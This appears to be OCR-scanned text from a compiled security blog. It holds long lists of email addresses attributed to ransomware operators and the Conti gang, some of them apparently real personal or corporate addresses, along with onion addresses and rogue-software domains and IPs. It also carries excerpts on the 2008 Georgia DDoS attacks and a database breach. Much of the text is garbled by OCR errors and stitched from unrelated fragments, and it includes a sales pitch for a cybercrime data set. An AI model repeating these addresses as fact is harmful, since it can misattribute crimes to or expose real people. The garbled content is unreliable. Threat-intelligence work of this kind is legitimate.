getscoin2@protonmail.com 
blacklivesmatter@qq.com 
zphc@cock.li 
linajamser@aol.com 
biashabtc@redchan.it 
yourfiles1@tutanota.com 
freshkart@420blaze. it 
dc1@imap.cc 
dc2@imap.cc 
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JimThompson@ctemplar.com 
quacksalver@msgsafe.io 
nomanscrypt@tuta.io 
nomanscrypt@onionmail.org 
cov191d@job4u.com 
todecrypt@onionmail.org 
Zeusl@msgsafe.io 
Zeus@zimbabwe.su 
clean@privyinternet.com 
partydog@msgsafe.io 
partydog@onionmail.org 
cryptoncrypt@tuta.io 
cryptoncrypt@onionmail.com 
rdphack@onionmail.org 
freelurk@aol.com 
getdecrypt@disroot.org 
baron38@webmeetme.com 
eye@onionmail.org 
1337@onionmail.org 

bad dev@tuta.io 
bad.dev@onionmail.org 
hpjar@keemail.me 
hpjar@protonmail.ch 
2021@onionmail.org 
2022@onionmail.org 
catapultacrypt@tuta.io 
catapultacrypt@cock.li 
godecrypt@onionmail.org 
godecrypt@tfwno.gf 
badhach@aol.com 
badhach2@aol.com 
lizardcrypt@tuta.io 
lizardcrypt@protonmail.com 
brokendig@zimbabwe.su 
filerecovery@zimbabwe.su 
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dokulus@tutanota.com 
dokulus2@firemail.cc 
biden@cock.li 
biden@tuta.io 
embog@firemail.cc 
attuneabbot@goat.si 
jessymail26@aol.com 
jessymail26@tuta.io 
necurs@aol.com 
necgusi@aol.com 
oral@tuta.io 
oral@msgsafe.io 
coleman2021@aol.com 
coleman2021@airmail.cc 
lizardcrypt@msgsafe.io 
carbanak@aol.com 
buhtrap@aol.com 
paymei@cock.li 
paymei@tuta.io 
paymei2@msgsafe.io 
vm1iqzi@aol.com 
twovm1iqzi@aol.com 
helpdecrypt@msgsafe.io 
con3003@msgsafe.io 
btcl11@gmx.com 
sorysorysory@cock.li 
TomLee240@aol.com 
TomLee24@tuta.io 
22btc@tuta.io 
21btc@cock.li 
decrypt@msgsafe.io 
decrypt@zimbabwe.su 
wannacry@msgsafe.io 
wannacry@mailbox.org 


mail@zimbabwe.su 
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keydecrypt@cock.li 
Avaaddams@msgsafe.io 
Freaker@msgsafe.io 
decrypt@disroot.org 
axitrun@cock.|i 
axitrun@tutanota.com 
astra2eneca@aol.com 
bluekeep@aol.com 
crypthub@tuta.io 
crypthub@cock.li 
hlper4y@tutanota.com 
hlper4y@cock.li 
getacrypt@tuta.io 
getacrypt@airmail.cc 
21btc@tuta.io 
datos@onionmail.org 
datos@msgsafe.io 
cryptodancer@onionmail.org 
cryptodancer@msgsafe.io 
gorentos2@firewall.cc 
helpshadow@india.com 
restoredjvu@firemail.cc 
pdfhelp@india.com 
helpmanager@firemail.cc 
helpmanager@iran.ir 
restoredjvu@india.com 
helpdatarestore@firemail.cc 
helpteam@mail.ch 
helpmanager@airmail.cc 
supporthelp@airmail.cc 
webmaster@pcthreat.com 
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This VPN-owning of malware infected hosts is not only resulting in improved anonymity 
for botnet masters and anyone else having access to the network, but is also contributing 
to the growth of VPN services designed specifically to be accessed by cybercriminals cre- 
ated on the foundatiosn of such admin panels offering easier reselling of access to the network. 


So, what’s the cost of anonymizing a cybercriminal’s Internet activities? Starting from 
$40 and going to $300 for a quarter of access, with the price increasing based on the level of 
anonymity added. 


1. http: //ddanchev. blogspot .com/2008/02/malware-infected-hosts-as-stepping.htm 


4.10.16 DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks (2008-10-15 21:07) 


(Wed Aug 27 11:13:09 2008 - Thu Aug 28 11:13:09 2008) 
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Part of [1]Georgia’s information warfare campaign aiming to minimize the bandwidth impact 
on its de-facto media platforms such as the web site of their Ministry of Foreign Affairs, [2]l’ve 
just received a report part of Georgia’s "Russian Invasion of Georgia" series entitled "Russian 
Cyberwar on Georgia", which is quoting me on page 4 in regard to the "too good to be courtesy 
of [3]Russia’s cyber militia" creative that appeared on the defaced Georgian President’s web 
site. The report also includes DDoS attack graphs and related details worth going through : 


"The last large cyberattack took place on 27 August. After that, there have been no se- 
rious attacks on Georgian cyberspace. By that is meant that minor attacks are still continuing 
but these are indistinguishable from regular traffic and can certainly be attributed to regular 
civilians. On 27 August, at approximately 16:18 (GMT +3) a DDoS attack against the Georgian 
websites was launched. The main target was the Georgian Ministry of Foreign Affairs. The 
attacks peaked at approx 0,5 million network packets per second, and up to 200-250 Mbits 
per second in bandwidth (see attached graphs). The graphs represent a 5-minute average: 
actual peaks were higher. 


(Wed Aug 27 11:14:27 2008 - Thu Aug 28 11:14:27 2008) 
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The attacks mainly consisted of HTTP queries to the http://mfa.gov.ge website. These were 
requests for the main page script with randomly generated parameters. These requests 
were generated to overload the web server in a way where every single request would need 
significant CPU time. The initial wave of the attack disrupted services for some Georgian 
websites. The services became slow and unresponsive. This was due to the load on the 
servers by these requests. As you see from the graphs above the attacks started to wind 
down after most of the attackers were successfully blocked. The latest attack may have been 
initiated as a response to the media coverage on the Russian cyber attacks." 


In case you’re interested in more factual evidence about what was happening at the 
particular moment in time, go through the following assessment - "[4]Coordinated Russia vs 
Georgia cyber attack in progress", as well as through the following posts - "[5]The Russia vs 
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stoneland@firemail.cc 
gorentos@firemail.cc 
ferast@firemail.cc 

restoring sup@india.com 
restoring sup@computer4u.com 
restoring reserve@india.com 
zipper@email.tg 
andresaha82@gmail.com 
viastnou.hlavou@mailfence.com 
random _anonymous@gmail.com 
crannbest@foxmail.com 
lanran-decrypter@list.ru 
tom.anderson@india.com 

DE coDER@mail2tor.com 
scryptx@meta.ua 
robert.swat@qip.ru 
helppme@india.com 
hepl1112@aol.com 
some@mail.ru 
ziz777@gmx.com 
ziz777@india.com 
ursa2277@gmx.com 
ursa2277@yahoo.com 
ursa2277@india.com 
ursa2277@bk.ru 
alexjer554@gmx.com 
alexjer554@india.com 
batary5588@gmx.com 
batary5588@india.com 
batary5588@protonmail.com 
robocript@india.com 
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robocript@gmx.us 
robocript@protonmail.ch 
Panzergen552@gmx.de 
Panzergen552@protonmail.com 
Panzergen552@india.com 
vendetta553@gmx.de 
vendetta553@india.com 
vendetta553@protonmail.com 
Filegorillal388@gmx.de 
Filegorillal388@india.com 
Filegorillal388@protonmail.com 
vine77725@gmx.de 
vine77725@india.com 
vine77725@protonmail.com 
panda7499@gmx.de 
panda7499@india.com 
panda7499@protonmail.com 
jonskuper578@gmx.de 
jonskuper578@protonmail.com 
fox2278@india.com 
fox2278@protonmail.com 
fox2278@gmx.de 
lion7872@protonmail.com 
lion7872@gmx.de 
lion7872@india.com 
Tizer78224@gmx.de 
filesreturn247@gmx.de 
filesreturn247@india.com 
filesreturn247@protonmail.com 
shieldO@usa.com 
3048664056@qq.com 
patrik.swize@gmx.de 
Slanler111@protonmail.com 
help244@ya.ru 


locker@bitmessage.ch 
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infokey24@india.com 
decryptmystuff@protonmail.com 
lioghaly@india.com 
kfrvokr@protonmail.ch 
vapeefiles@aol.com 
infocrypt@india.com 
helper@bitmessage.ch 
BM-2cX2s3Zoqw9JFC9QELpPPPmuKBGRQqF7pL7@bitmessage.ch 
lalabitch2017@yandex.com 
filesrestore@tutanota.com 
wowsmith123456@posteo.net 
muhendis@mail.ua 
muhends@mail.ua 
decr@cock.li 

decrsup@cock.li 
payoff@cock.li 
payoff@bigmir.net 
chines34@protonmail.ch 
oceannew _vb@protonmail.com 
garryhelpyou@qq.com 
garrymagic@tutanota.com 
gladius rectus@aol.com 
gladius rectus@india.com 
universe1@protonmail.ch 
universe11@bigmir.net 
payfordecrypt@qq.com 
crypthelp@qq.com 
darkwaiderr@tutanota.com 
darkwaiderr@gmx.de 
decrypt24@protonmail.com 
asdqwer123@cock.li 
assistance@firemail.cc 
goldwave@india.com 
blackworld@cock.|i 
fidel_romposo@aol.com 
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StormRansomware@gmail.com 
ms.heisenberg@aol.com 
Wecanhelp@protonmail.com 
XXXXXXX @XXXX.XXX 
onion33544@india.com 
redboot@memeware.net 
decryptorx@cock.li 
fuck4u@cock.li 
irmagetstein@india.com 
Jackie7@asia.com 
Jchan@india.com 
hyakunoonigayoru@yahoo.co.jp 
B32588601@163.com 
TheYuCheng@yeah.net 
BaYuCheng@yeah.net 
contactfileszip@email.tg 


contato.arquivoszip@email.tg 


contatoarquivoszip@private-mail.com 


maxicrypt@cock.li 


maxidecrypt@protonmail.com 


nullforwarding@qualityservice.com 


m4zm0v@keemail.me 


JeanRenoAParis@protonmail.com 


Leviathan13@protonmail.com 


gentilpascal@bitmessage.ch 


brian.r.goodwin@protonmail.com 


imBoristheBlade@protonmail.com 


gomer@horsefucker.org 
gomersimpson@keemail.me 
johnsonwhate@protonmail.com 
johnsonwhate@tutanota.com 
A654763764@qq.com 
decrypter02@cumallover.me 
piterpen02@keemail.me 


jimmtheworm@dicksinmyan.us 
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newrecoverybot@pm.me 
sqibackup3@mail.fr 
doctor666@mail.fr 
newrecoveryrobot@pm.me 
doctor666@cock.li 
repairdb@seznam.cz 
repairdb@mail.fr 
decryptor911@airmail.cc 
decryptor666@420blaze. it 
RemotePChelper@cock.|i 
remotePChelper@tutanota.com 
BCPFILE17@tutanota.com 
returndb@seznam.cz 
returndb@airmail.cc 
support911@cock.li 
xilttbg@tutanota.com 
doctorhelp2120@cock.li 
repairdatadochelp@airmail.cc 
returndb@airmail.ee 
1lrestOre@protonmail.com 
lrestOre@cock.|i 
cryptolifeguard@cock.li 
unlOck@keemail.me 
8472host@mail.fr 
8472host@cock.li 
legalrestore@tutanota.com 
SwOrdflsh@cock.li 
Swordflsh@tutanota.com 
host2021@tutanota.com 
aid.keepcalm@seznam.cz 
aid.keepcalm@protonmail.com 
owerhacker@hotmail.com 
skgrhk2018@tutanota.com 
skgrhk2018me@tutanota.com 
sqqsdr01@keemail.me 
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Georgia Cyber Attack"; "[6]Who’s Behind the Georgia Cyber Attacks?"; "[7]Georgia President’s 
web site under DDoS attack from Russian hackers". 


1. http://www.mediachannel . org/wordpress/2008/08/14/the-cnn- effect-georgia-schools-russia-in-information-war 
fare/ 

2. http: //georgiaupdate. gov.ge/doc/10006744/CYBERWAR-7%20fd_2_new. pdf 

3. http://computerworld.com/action/article.do?command=viewArticleBasicktaxonomyName=cybercrime_and_hacking&a 
rticleId=9112443&taxonomyId=82kintsrc=kc_top 

4. http://blogs.zdnet.com/security/?p=1670 

5. http: //ddanchev. blogspot .com/2008/08/russia-vs-georgia-cyber-attack. html 

6. http: //ddanchev. blogspot . com/2008/08/whos-behind-georgia-cyber-attacks. html 

7. http://blogs.zdnet .com/security/?p=1533 


4.10.17 TorrentReactor Compromised, 1.2M Users Database In the Wild 
(2008-10-16 14:56) 
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It appears that TorrentReactor.net, a highly popular torrent tracker, got compromised in 
September, with it’s users database concisting of 1.2M users and TorrentReactor’s source 
code stolen. 
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name4v@keemail.me 
dfs20@keemail.me 
styver.goodman@aol.com 
maktoob786@takfir24.net 
haraam@takfir24.net 
haraam@alayam24.net 
blackpanda007@torbox3uiot6wchz.onion 
btc.freshO1@gmail.com 
unixc47@gmail.com 
d3g1d5@gmail.com 
khiwosang@gmail.com 
alpha2018a@aol.com 
ZaszyfrowanePliki@ZaszyfrowanePliki.us 
decry1@cock.li 

decry2@cock.li 


BM-2cTzz6rwtd8d7qd1wVegH6sZ44GbNPV8Li@bitmessage.ch 


ransomware@sj.ms 
randomlocker@tuta.io 
rebushelp@airmail.cc 
rebushelp@protonmail.com 
rebushelper@exploit.im 
cryptghOst@protonmail.com 

160505 @tt3j2x4k5ycaa5zt.onion 
kvlly@protonmail.ch 
iohw634@gmail.com 
decryptmefinger@gmail.com 
backuppc@tuta.io 
backuppc@protonmail.com 
backuppcl1@protonmail.com 
b4ckuppcl@yandex.com 
b4ckuppc2@yandex.com 
backuppcl@dr.com 
TimisoaraHackerleam@protonmail.com 
m4xroothackerteam@protonmail.com 


Vitaly. Yermakov@protonmail.com 
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VitalyYermakov@cock.li 
UnlockAlexKingman@protonmail.com 
soetrisno.bachir@kein.go.id 
support wc@bitmessage.ch 
auuahk@yandex.com 
ouuohk@eclipso.eu 
barracuda@airmail.cc 
barracudahelp@protonmail.com 
barracudahelper@exploit.im 
cryptlocker@tutanota.com 
crypto wannacash@protonmail.com 
help73@tutanota.com 
help73@protonmail.com 
buratino@cock.li 
thyrexsuck@cock.li 
absolutefreedom@cock.|i 
lovelife@cumallover.me 
lovelife@xabber.org 
onlymoney@firemail.cc 
noallpossible@cock.li 
supermax@cock.lu 
nichegolichnogo@airmail.cc 
clubnika@elude.in 
lisasu@elude.in 
clubnika@cock.li 
safronov@cock.|i 
safronov123@tuta.io 
mylifeisfear@cock.li 
netakaykakvse@cock.li 
euphoria-help@elude.in 
omygosh@cock.li 
itstome@cock.li 
petrov441@protonmail.com 
johnstang@zoho.eu 
johnsmith987654@tutanota.com 
19454 


t314.520@qq.com 
omg-help-me@openmailbox.org 
backdata@cock.li 
passsenderdec@gmail.com 
ik253@email.vccs.edu 
MilesFlannagan@protonmail.com 
rsupp@protonmail.ch 
rupp@protonmail.ch 
decryptscrabber@mail.ru 
scrabber@mail.ru 
filekerk@tutanota.com 
yougame@protonmail.ch 
swordofsakura@india.com 
krupalupium@india.com 
brianmaps@gmail.com 
amigo a@india.com 
desktopmain228@india.com 
care _nim@tutamail.cc 
desktopman228@india.com 
decrypteasy@protonmail.cc 
kreker@india.com 
filesharper@42Oblaze. it 
cricket@tutanota.com 
data _safe@mail.com 
datasafe@airmail.cc 
dec.service@protonmail.com 
nmare@cock.li 
incognitoman@protonmail.com 
siniyzabor@protonmail.com 
recover 24 7@protonmail.com 
happy _sysadmin@protonmail.ch 
iracomp4@protonmail.ch 
iracomp2@protonmail.ch 
mrddnet _support@protonmail.ch 
achtung _admin@protonmail.com 
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aam _sysadmin@protonmail.com 
helpadmin2@protonmail.com 
helpadmin2@cock.|i 

under _amur@protonmail.ch 
fedelsupportagent@cock .li 
admin@cuba-supp.com 

cuba support@exploit.im 

LR FWS_H2M _ET@protonmail.ch 
desync@airmail.cc 
yeahdesync@airmail.cc 
CottleAkela@protonmail.com 
QyavauZehyco1994@o2.pl 
AbbsChevis@protonmail.com 
IjugodiSunovib98@o2.pl 
JinMaglaya@protonmail.com 
YpilokOmoadae1994@o02.pl 
SuzuMcpherson@protonmail.com 
AsuxidOruraep1999@o2.pl 
DharmaParrack@protonmail.com 
wyattpettigrew8922555@mail.com 
MayarChenot@protonmail.com 
QicifomuEjijika@o2.pl 
AperywsQaroci@o2.pl 
AsuxidOruraep1999@o2.pl 
Couwetlzotofo@o2.pl 
DutyuEnugev89@o2.pl 
PhanthavongsaNeveyah@protonmail.com 
RezawyreEdipi1998@o2.pl 
RomanchukEyla@protonmail.com 
SayanWalsworth96@protonmail.com 
SchreiberEleonora@protonmail.com 
artemy75@protonmail.com 
artemy75@cock.li 
artemy75@tutanota.com 
jokeroo@protonmail.com 
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jokeroo@exploit.im 
info@borontok.uk 
info@botontok.uk 
viethckr@yandex.com 
silena.berillo@gmail.com 
hto2018@yandex.ru 
supportd@tfwno.gf 
tellyouthepass@protonmail.com 
coinmoney@cock.|i 
asmo49@asmodeus.us 
legion.developers72@gmail.com 
BackFileHelp@protonmail.com 
dcyptfils@protonmail.ch 
letitbedecryptedzi@gmail.com 
RECOVERUNKNOWN@protonmail.com 
Helpcrypt1@tutanota.com 
DecrypterSupport@protonmail.com 
unlockme123@protonmail.com 
Mr.TeslaBrain@gmail.com 
Dataadecrypt@Cock.|i 
decryp7@foxmail.com 
Decryptions@protonmail.com 
ScorpionEncryption@protonmail.com 
FilesHelp@tutanota.com 
jacdecr@tuta.io 
Steven77xx@protonmail.com 
Rezcrypt@cock.li 
decryptfiles@horsefucker.org 
DatarestOre@aol.com 
DatarestOre@protonmail.com 
datarestOre@xmpp.jp 
Hiddenhelp@cock.li 
decodehelp@cock.li 
RestoreData@airmail.cc 
fixallfiles@tuta.io 
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Recoveryhelp2019@protonmail.com 
leltitbedecrypteddzi@gmail.com 
blackroot54@protonmail.com 
recovery94@cock.li 
Mr.TeslaBrain@protonmail.com 
teslabrain@cock.li 
filedownload2020@protonmail.com 
rx99@cock.li 
Honeylock@protonmail.com 
AdvancedBackup@protonmail.com 
recover85@protonmail.com 
unlock0101@protonmail.com 
rdpmanager@airmail.cc 
SupportOdveta@protonmail.com 
SupportOdveta@elude.in 
softs98@protonmail.com 
josefrendal797@gmail.com 
tools1990m@gmail.com 
toolsI990m@gmail.com 
vashmail@protonmail.com 
vashmail@ctemplar.com 
vashmail@firemail.cc 
Filedecryptor@protonmail.com 
darkencryptor@tutanota.com 
smartrecav@tutanota.com 
decodeodveta@protonmail.com 
decrypt0077@gmail.com 
Decfile431@tutanota.com 
decryptfiless@gmail.com 

new _wave@tuta.io 
newwave@airmail.cc 
9eab6e85bd12b@tutanota.com 
t310ea89b4347@protonmail.com 
getcrypt@cock.li 
cryptget@tutanota.com 
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OFFTITAN@cock.|i 
cryptomadbusiness@protonmail.com 
info@morris2uk.com 
FreeWizard9@protonmail.com 
sherlokcock@cock.li 
omegax0@protonmail.com 
flowerboard@torguard.tg 
flower.harris@protonmail.com 
flower.harris@tutanota.com 
flowerboard@protonmail.com 
doris.sammer@rasendmail.com 
mcrypt2019@yandex.com 
hildaseriesnetflix125@tutanota.com 
hildaseriesnetflix125@horsefucker.org 
hildalolilovesyou@airmail.cc 
hildalolilovesyou@memeware.net 
goodmen@countermail.com 
datareesstore@tutanota.com 
goodmen@cock.li 
X280@protonmail.com 
zxqwopnm@tutanota.com 
decrypt.russ@protonmail.com 
dawndec001@protonmail.com 
sifremicoz@protonmail.com 
phomen@cock.li 
phomen@airmail.cc 
lafoievologjaninl23@tutanota.com 
lafoievologjaninl23@protonmail.com 
mantiticvil976@protonmail.com 
fahydremu1981@protonmail.com 
flapalintal950@protonmail.com 
xersami@protonmail.com 
bigbosshorse@ctemplar.com 
bigbosshorse@xmpp.jp 
heronpiston@ctemplar.com 
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heronpiston@xmpp.jp 
igbosshorse@xmpp.jp 
horseleader@xmpp.jp 
bigboss@thesecure. biz 
File.decrypt@onionmail.org 
file.decrypt@yahoo.com 
ferrari@msgsafe.io 
bannedlands@msgsafe.io 
3475857701@qq.com 
iknowyouandiseeyou@protonmail.ch 
lokeradmin@cock.li 
adminsysloker@airmail.cc 
UneGarcOn1@cock.li 
LeJetepreYO@cock.|i 
behappywithyourdata@airmail.cc 
happydataowner@firemail.cc 
05250lock@tutamail.com 
05250lock@protonmail.com 
05250lock@tut.com 
grdoks@tutanota.com 
dweezells@airmail.cc 
krastoken@gmail.com 
hudsonamily@gmail.com 
Iwei@malwarebytes.com 
tuhafcoderus@protonmail.com 
carecaxyzZ@pm.me 

support _blackkingdom2@protonmail.com 
CSGVyzko@mail2tor.com 

china _jm@protonmail.ch 
WannaRenemal@goat.si 
WannaReneval@goat.si 

Bossi tosi@protonmail.com 
maill help me@protonmail.com 
newneo1312@protonmail.com 
bitsupportz@protonmail.com 
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bitsupportz@cock.li 
brovsky@aol.com 
brovsky@airmail.cc 
asmodey3301@protonmail.com 
btc _bitts@protonmail.com 
decryption@qbmail.biz 
reservedecryption@protonmail.com 
buydecryptor@aol.com 
po2977@protonmail.com 
Helprecovery@qbmail.biz 
Tbr66@protonmail.com 
wmanxtere@privatemail.com 
raypas@goat.si 
zorab28@protonmail.com 
UnluckyWare@torbox3uiot6wchz.onion 
UnluckyWare@mail2tor.com 
A4lok3r@protonmail.com 
4lok3r@tutanota.com 
TwoHearts911@protonmil.com 
jerjis@tuta.io 
jerjis@tutamail.com 

unlock rabbit@pm.me 
Gomanje@Indea.info 
info@russianvip.io 
Try2Cry@Indea.info 
keepcredit0l15@protonmail.com 
honestman0023@protonmail.com 
fairman0023@protonmail.com 
tuvieja@yopmail.com 
alt.ya-20xswvd@yopmail.com 
xp10.ransom@gmail.com 
geneve010@protonmail.com 
geneve020@protonmail.com 
BM-2cT4ifo6SY9QW7gPUJ4EvfeBr]|M5jWR4TQ@bitmessage.ch 


haunexuwofwuf@protonmail.com 
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cyber.duskfly@protonmail.com 
lasvegasincel@cocl.li 
duskeer@protonmail.com 
lasvegasincel@cock.li 

more.cce 2020 final@cce2020.kr 
anon4113@protonmail.com 
mars _dec@outlook.com 

anton _ivan _8989@mail.ru 
nataliaburduniuc96@gmail.com 
aliseoanal@gmail.com 
FileEngineering@mailfence.com 
FileEngineering@tutanota.com 
FileEngineering@elude.in 
ICanFixYourFiles@tutanota.com 
ICanDecryptYourFiles@cock.li 
egalytyy@protonmail.com 
johnborn@cock.|i 

jborn@tuta.io 

ransom. izi.crypt@gmail.com 
VovanAndLexus@cock.|i 
eiklot@hi2.in 
omm72031@yandex.ru 
onimransom@cock.li 
onimransom@protonmail.com 
Whiteblackgroup002@gmail.com 
Wbgroup022@gmail.com 
FilesRecoverEN@Protonmail.com 
psychopath7@tutanota.com 
Myfiles.sir@gmail.com 
ramilo2122@yandex.com 
hanta@420blaze.it 
n3twOrm@tuta.io 
nationalsiense@protonmail.com 
securityagent@techmail.info 
zitenmax@rambler.ru 
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Despite that the attacker claiming responsibility is citing reputation enhancement as the 
reason for the attack, sooner or later the personal details will be sold and resold to spammers, 
with the possibilitity for spear phishing attacks left wide open. 


4.10.18 A Diverse Portfolio of Fake Security Software - Part Nine (2008-10-16 16:00) 


1 RegistryDoctor2008 


‘Try row. it's FREED 


POWERFUL CLEANING OF YOUR PC WORLD! CLICK HERE 
Lempert eat sabroemataen, 


Read more>> 


Large protheny 
The performance of you syste 6 very stow. Tou probably do ret know how 

mary unecessary or corrupted files stored on your dive. Co you wart to fee 
ut space On yo Gsk and morove the performance of you systew? 


Fast solution 
You can get nd of al unnecessary Ges, prevent dete loss and keep your Gives 

Geen by semoty harring es progam nstalied. RegistryDoctor 2008 ges you 
am coportunsty te have contol over every piece of information on your PC! Need 
Borer ee computer wath excelent performance? Try RegistryOacter 2008 
ard make ne of & advartages! 


Enhance your PC 
As $00" a8 you hove downloaded and instaled as softmare, 


Among the most recently spotted rogue security software applications and fake system 
maintenance tools are : 


pcvirusremover2008 .com (78.157.142.47; 92.62.101.67) 
registrydoctorpro2008 .com 

powerfulvirusremover2008 .com 

registrydoctor2008 .com 

topregistrydoctor2008 .com 

securefileshredder2009 .com 

securefilesshred .com 
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blackbytel1@onionmail.org 
blackbyte@onionmail.org 
pentros30@protonmail.com 
pentaxyz777@protonmail.com 
gxa34rttf50gqlagnes@gmail.com 
rans _contact@xmpp.jp 
le020090707@outlook.com 
kcwjspen@gmail.com 
emrahhalitoglu754@gmail.com 
EMAIL@protonmail.com 
bsprj1020@protonmail.com 
udachal23yes@mail2tor.com 
encrypter@tuta.io 
pol.aris@opentrash.com 
pol.aris@tutanota.com 
AdminOwl@bitmessage.de 
SuportOwl@mail2tor.com 
gOdd@criptext.com 
decoder@firemail.cc 
helpingdecode@tutanota.com 
Miraclel11@keemail.me 
Miiraclel1l1@yandex.com 
wannayourdata@gmail.com 
grepmord@protonmail.com 
avghost@oteteam.com 
rook@onionmail.org 
securityRook@onionmail.org 
Cryptomafia@tuta.io 
Zakripper@mail.com 
Becky.cely2@aol.com 
habibi.habibi3@aol.com 

mk _cyrox@aol.com 
Funox@ya.ru 
Repairme2017@keemail.me 


sammer _winter@aol.com 
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Secure2017@tuta.io 
Decryptoffice@tuta.io 
Beauchamp.tammie@mail.ru 
freefoams@protonmail.com 
albertkerr94@mail.com 
Averia@tuta.io 
Cde@onionmail.info 
FHYPOLITE@dallasisd.org 
1_kill yourself 1@protonmail.com 
silver@decryption.biz 
bronmerkberpa1976@protonmail.com 
help@cairihi.com 
Badfail@qq.com 
Zeman@tutanota.de 
Desparo@tuta.io 

Ivan _gargurevich@yahoo.com 
icrypt@cock.li 
helpersmasters@airmail.cc 
BTCBREWERY@protonmail.com 
ht2707@email.vccs.edu 
Decryptmyfiles@qq.com 
langolier@airmail.cc 
wallyredd@aol.com 
petrus34@p-security.|i 
support@p-security.|i 

William _Kidd _2019@protonmail.com 
DonovantTudor@aol.com 

Back _me@foxmail.com.ph 
cybergroup11@aol.com 
data1992@protonmail.com 
pixell@tutanota.com.ph 
StuardRitchi@tutanota.com 
filesrecoveren@onionmail.org 
raziotix@tuta.io 
leesb@coscokorea.com 
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intercobros@protonmail.com 
intercobros@mailfence.com 
FilesRecoverDE@Gmail.com 
FilesRecoverFR@Gmail.com 
FilesRecoverFR@Onionmail.org 
Blitzkriegoc@protonmail.com 
davidgoldman@cock.li 
portedhiggens@firemail.cc 
God85Ar@yandex.com 
jetl100@safe-mail.net 
Figskici@tutanota.com 
decodeacrux@gmail.com 
decodeacrux@msgsafe.io 
BobGreen85@criptext.com 
BobGreen85@aol.com 


BobGreen85@tutanota.com 


reddragon3335799@protonmail.ch 


jalicry@pm.me 
crvhelp@dr.com 
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Dear blog readers, 


Who wants to obtain direct download access to my 100GB "Cybercrime Forum Data Set for 
2022" with a 50 % discount which I’m offering only today for research data mining and 
enrichment purposes? 


Drop me a line at dancho.danchev@hush.com 
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a-a-v-2008 .com (92.241.163.27) 
aav2008 .com 
adv-a-v .com 


ietoolsupdate .com (208.72.168.84) 
iexplorerfile .com 


Registrants of notice for cross-checking purposes : 
Sagent Group (adminsagent@gmail.com) 

Billy A. Schmitt (admiragroup@yahoo.com) 
Shestakov Yuriy (alexvasiliev1987@cocainmail.com) 
Andrej Kazanski (akazanski@europe.com) 


Related posts: 

[1]Violating OPSEC for Increasing the Probability of Malware Infection 
[2]A Diverse Portfolio of Fake Security Software - Part Eight 

[3]A Diverse Portfolio of Fake Security Software - Part Seven 

[4]A Diverse Portfolio of Fake Security Software - Part Six 

[5]A Diverse Portfolio of Fake Security Software - Part Five 

[6]A Diverse Portfolio of Fake Security Software - Part Four 

[7]A Diverse Portfolio of Fake Security Software - Part Three 

[8]A Diverse Portfolio of Fake Security Software - Part Two 

[9]Diverse Portfolio of Fake Security Software 


. http: //ddanchev. blogspot .com/2008/07/violating-opsec-for- increasing. htm 
. http: //ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security.htm 
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18.2.14 Exposing the Conti Ransomware Gang - An OSINT Analysis (2022-02-28 11:47) 


[1] 


Awesome! 


Based on the recently leaked internal communication of the infamous Russia based Conti ran- 
somware gang in this post I'll provide actionable intelligence on the Conti ransomware gang 
in-depth and discuss and offer practical actionable intelligence on their Internet connected in- 
frastructure in terms of providing Dark Web onion Web sites personal email address accounts 
IPS and command and control server IPs part of the gang’s vast and vibrant Internet connected 
infrastructure with the idea to assist the U.S Intelligence Community and U.S Law Enforcement 
on its way to track down and prosecute the cybercriminals behind these malicious and fraudu- 
lent ransomware campaigns. 


Conti ransomware gang’s primary Dark Web Onion XMPP: 
hxxp://q3mcco35auwcstmt.onion 


Sample screenshots of Conti ransomware gang’s Internet connected infrastructure: 
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Host distribution by ISP 
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Sample personal email address accounts known to have been managed and operated by the 
members of the Conti ransomware gang include: 


loguntsov@gmail[.Jcom 
smtbrowser@thesecure[. ]biz 
21lyelow21@jabb[.Jim 
jamonsmaslom@xmppl.]jp 
vladimir[.]tyrenko@maill[.]ru 
benalen@exploit[.]Jim 
tdemeza@gmail[.Jcom 
Berkley Randal@netc[.]it 
eldorado@countO[.]ws 
firefox333@xmppl[.]jp 
avamar@gnu[.]gr 
andrej[.]sergeev _2020@maill[.]ru 
volhvb@exploit[.]Jin 
armata@exploit[.]Jim 
ddivelbiss@divelbiss[.]Jcom 
vruel@blah[.]im 
jydmeszp@sharklasers[.]com 
support@korovka[.]Jname 
support@mpro[. ]la 
nrobootbander@jabb[. Jim 
19499 


n4815162342@jabb[.Jim 
nsheppard@jabber[. ]ru 
nsectorzero@jabb[.]im 
arturh76@jabber[.]ru 
neversay@mail[.]ru 
k[.]startsev@xmppl[. ]jp 
biomechanic3000@xmppI.]jp 
nnikolal131189@gmail[.]Jcom 
nalec[.]kirsanov@maill[.]ru 
warrenmega@protonmaill[.]com 
ahurtado@grundfos[.]com 
joe@flowdataindustries[.]com 
njointofffdsd@protonmaill.Jcom 
basils1991@gmaill.]Jcom 
snowwinter@exploit[.]im 
tiffany[.]Jhuff@levelconsult[.]us 
nrandman@thesecurel. ]biz 
vasilymm@memail[.]Jcom 
interview _admin@jabb[.]im 
sm0k3 _1337@xmppl.]jp 
uniftorambo@exploit[.]im 
rdpcorp _@thesecure[. ]biz 
support@cletricks[.]Jcom 
jee-nospam@jabbin[. ]pl 
akonitborec@thesecure[. ]biz 
operathionshieldfr@protonmail[.]com 
DOC _|ID@exploit[.Jim 
al[.]pro[.]J80@jabb[.]im 
i72jc910jecuwj72771@creep[.Jim 
emigrant@xmpp[. ]jp 
blackmatter _interviews@exploit[.]Jim 
namso@thesecure[.]biz 
karal@xmppl[. ]jp 
admin@expiro-team[. ]biz 
martinx@jabbim[.]cz 
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maestros11@jabber[.]ru 
emilyspizza@pimux[.]de 
support@j[.]vip72[.lorg 
supportl@ij[.]vip72[.]org 
Kopytinv1997@bk[.]ru 
xvioletta2013@gmail[.]Jcom 
alexmillerlL26@outlook[.]com 
alexm112266@outlook[.]Jcom 
aravancargol@proloads|[.]Jcom 
michal[.Jolbrychtowicz@student[. Juj[.]edu[.]pl 
jameswatson@xmpp[.]jp 
conti[.]cont@yandex[.]ru 
gpbit@thesecure|[.]biz 
cps123@exploit[.]im 
grave@jabber[. ]hot-chilli[. Jeu 
joynses@thesecure[. ]biz 
verchunls@chatterboxtown[.]us 
iqbal@javabomb[.]Jcom 
nolaf@scholja[.]de 
nnacho[.]travesib@gmail[.]Jcom 
dpigeon@exploit[.Jim 
udotop12@thesecure[.]biz 
navos@thesecure[.]biz 
navos@strong[.]pm 
njoynses@thesecure[. ]biz 
olaf@scholja[.]de 
benalien@xmppl[.]jp 
tdemeza@gmaill.Jcom 

Berkley Randal@netc[.]it 
eldorado@countO[.]ws 
firefox333@xmppl[.]jp 
